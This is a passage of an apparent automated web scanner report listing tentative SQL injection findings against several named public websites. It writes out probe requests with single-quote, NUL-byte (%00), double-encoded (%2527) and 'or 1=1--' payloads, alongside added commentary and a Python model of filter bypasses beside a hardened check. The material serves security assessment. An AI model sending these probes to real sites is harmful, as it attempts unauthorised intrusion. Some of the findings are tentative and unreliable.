The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Both responses below are generic 404 pages: the first from a host identifying as Apache, the second from Apache/2.2.14 (Ubuntu) with a Date header some fifteen minutes earlier, so the two requests were evidently served by different back-end hosts. Neither response contains database error text, and the claim that the application blocks injection (and that %00 evades it) rests only on this differential; confirm manually before treating it as a WAF bypass.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adsc/d724324/16/752264/randm.js%00' HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:31 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adsc/d724324/16/752264/randm.js%00'' HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 21:48:24 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 318
Keep-Alive: timeout=120, max=709
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc/d724324/16/752264/randm.js was not found on thi
...[SNIP]...

1.3. http://amch.questionmarket.com/adsc/d724324/27/726813/randm.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d724324/27/726813/randm.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

In Response 2 below the server's own 404 text echoes the path as /adsc%27%27/..., that is, the web server decoded %2527 to %27 exactly once and the literal quote was never produced; the two 404 pages also come from different Server strings (Apache and Apache-AdvancedExtranetServer/2.0.50). Nothing in this exchange shows the value reaching a query, so treat the double-decoding claim as unverified.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
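As an added illustration of the two bypasses reported in 1.2 and 1.3 (NULL byte and double URL-encoding), not taken from the report or from any vendor's WAF, the following models a native-code-style filter that stops inspecting at the first NUL, and a filter that decodes only once in front of an application that decodes again, beside the check the Remediation detail calls for: validate the value after the application's own canonicalisation and reject NUL outright. The filter logic, the block list and the application's second decode are assumptions for illustration; the three paths are the ones from the Request 1 lines of 1.1, 1.2 and 1.3.

```python
from urllib.parse import unquote

# Characters the hypothetical filter tries to keep out of the REST path.
BLOCKED = ("'", '"', ";", "--")


def contains_blocked(value):
    return any(token in value for token in BLOCKED)


def filter_native_style(raw_path):
    """Hypothetical filter modelled on native code: a C string ends at the
    first NUL, so nothing after a decoded %00 is ever inspected.
    Returns True when the request is allowed through."""
    decoded = unquote(raw_path)
    inspected = decoded.split("\x00", 1)[0]
    return not contains_blocked(inspected)


def filter_single_decode(raw_path):
    """Hypothetical filter that decodes once and checks the result."""
    return not contains_blocked(unquote(raw_path))


def app_canonicalise(raw_path):
    """Assumed application behaviour: the web server decodes once and the
    application performs a second, custom decode before using the value."""
    return unquote(unquote(raw_path))


def hardened_check(raw_path):
    """Validate the value the application will actually use: run the same
    canonicalisation first, refuse NUL and other control bytes outright,
    then apply the block list. Returns True when the request is allowed."""
    value = app_canonicalise(raw_path)
    if any(ord(ch) < 0x20 for ch in value):
        return False
    return not contains_blocked(value)


# Paths copied from the report's Request 1 lines (1.2, 1.3) plus a benign one (1.1).
NUL_BYPASS = "/adsc/d724324/16/752264/randm.js%00'"
DOUBLE_ENCODED = "/adsc%2527/d724324/27/726813/randm.js"
BENIGN = "/adsc/d647401/46/799689/randm.js"


def evaluate(raw_path):
    """Return (native_filter_allows, single_decode_filter_allows,
    hardened_check_allows, value_seen_by_application)."""
    return (
        filter_native_style(raw_path),
        filter_single_decode(raw_path),
        hardened_check(raw_path),
        app_canonicalise(raw_path),
    )


if __name__ == "__main__":
    for label, path in (("NUL", NUL_BYPASS),
                        ("double-encoded", DOUBLE_ENCODED),
                        ("benign", BENIGN)):
        print(label, evaluate(path))
```

The NUL path sails through the native-style filter because the quote sits past the terminator; the double-encoded path sails through the single-decode filter because it still reads `%27` at inspection time and only becomes `'` after the application's second decode. The hardened check sees the same string the application will use, so both are rejected while the benign path is allowed.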

Request 1

GET /adsc%2527/d724324/27/726813/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:34 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adsc%2527%2527/d724324/27/726813/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:34 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 235
Keep-Alive: timeout=120, max=890
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc%27%27/d724324/27/726813/randm.js was not found
...[SNIP]...

1.4. http://amch.questionmarket.com/adsc/d724324/27/752289/randm.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d724324/27/752289/randm.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adsc/d724324/27%00'/752289/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:36 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adsc/d724324/27%00''/752289/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:36 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 213
Keep-Alive: timeout=120, max=982
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc/d724324/27 was not found on this server.</p>
</
...[SNIP]...

1.5. http://amch.questionmarket.com/adsc/d747416/11/748729/randm.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d747416/11/748729/randm.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adsc/d747416/11/748729%00'/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:37 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adsc/d747416/11/748729%00''/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:37 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 220
Keep-Alive: timeout=120, max=902
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc/d747416/11/748729 was not found on this server.
...[SNIP]...

1.6. http://amch.questionmarket.com/adsc/d763769/11/770950/randm.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d763769/11/770950/randm.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adsc'/d763769/11/770950/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:39 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adsc''/d763769/11/770950/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:39 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 231
Keep-Alive: timeout=120, max=496
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc''/d763769/11/770950/randm.js was not found on t
...[SNIP]...

1.7. http://amch.questionmarket.com/adsc/d793570/3/793591/randm.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d793570/3/793591/randm.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adsc/d793570/3%00'/793591/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:41 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adsc/d793570/3%00''/793591/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:41 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 212
Keep-Alive: timeout=120, max=906
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc/d793570/3 was not found on this server.</p>
</b
...[SNIP]...

1.8. http://amch.questionmarket.com/adsc/d798609/10/805369/randm.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d798609/10/805369/randm.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adsc%00'/d798609/10/805369/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:42 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adsc%00''/d798609/10/805369/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:42 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 202
Keep-Alive: timeout=120, max=905
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc was not found on this server.</p>
</body></html
...[SNIP]...

1.9. http://blog.supermedia.com/archives/tips/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blog.supermedia.com
Path:   /archives/tips/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 21150963'%20or%201%3d1--%20 and 21150963'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /archives/tips21150963'%20or%201%3d1--%20/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Thu, 03 Feb 2011 19:48:47 GMT
Server: Unspecified
Content-Length: 0
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:04:06 GMT;path=/

Request 2

GET /archives/tips21150963'%20or%201%3d2--%20/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response 2

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:49:06 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:04:06 GMT;path=/



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml" title="RSS Feed" href="/feed/" />
<link rel="alternate" type="application/atom+xml" title="Atom Feed" href="/feed/atom/" />

<link type="text/css" rel="stylesheet" href="http://www.superpages.com/inc/social/soc.css" >
<link rel="stylesheet" type="text/css" href="http://www.supermedia.com/spportal/style/cobrand.css" >
<link rel="stylesheet" type="text/css" href="http://www.supermedia.com/spportal/style/supermedia/supermedia.css">
<link rel="stylesheet" type="text/css" href="/main.css">
<script type="text/javascript" src="http://www.supermedia.com/spportal/js/jquery/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="http://www.supermedia.com/spportal/js/jquery/blockui.js"></script>
<script type="text/javascript" language="JavaScript" src="http://www.supermedia.com/spportal/js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="http://www.supermedia.com/spportal/js/header.js"></script>

<meta name="decorator" content="supermedia">

<meta name="keywords" content="directory advertising options, business directory marketing options, directory options, yellow pages, business directories, Spanish yellow pages, digital directories">
<meta name="description" content="Our directories complement each other to give you an unmatched reach to every audience imaginable including companion directories, bilingual and spanish directories, business to businesss (b2b) directories and digital directories.">
<link rel="STYLESHEET" type="text/css" href="http://www.supermedia.com/spportal/style/sup
...[SNIP]...

1.10. http://docs.jquery.com/UI/Dialog [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://docs.jquery.com
Path:   /UI/Dialog

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /UI/Dialog?1%2527=1 HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:07:57 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<title>Database error - jQuery JavaScript Library</title>
...[SNIP]...

Request 2

GET /UI/Dialog?1%2527%2527=1 HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:08:53 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...

1.11. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /15/182221'/abc-development-inc/chicago.aspx/x22 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 03 Feb 2011 21:48:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 5453
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=KHEEKNBBHJMPFGDEDDNMBPHF; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22</title>
<meta name="descrip
...[SNIP]...

Request 2

GET /15/182221''/abc-development-inc/chicago.aspx/x22 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 21:48:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11282
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=MHEEKNBBLHOHJNHBIPNHJKNL; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22</title>
<meta name="descrip
...[SNIP]...

1.12. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /15/182221/abc-development-inc/chicago.aspx/x22' HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 03 Feb 2011 21:48:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 1369
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=CJEEKNBBDCJDLMEACLODNOPI; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22'</title>
<meta name="descri
...[SNIP]...

Request 2

GET /15/182221/abc-development-inc/chicago.aspx/x22'' HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 21:48:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11302
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=EJEEKNBBLAHNPDBHLMHJLNKM; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22''</title>
<meta name="descr
...[SNIP]...

1.13. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bizfind.us
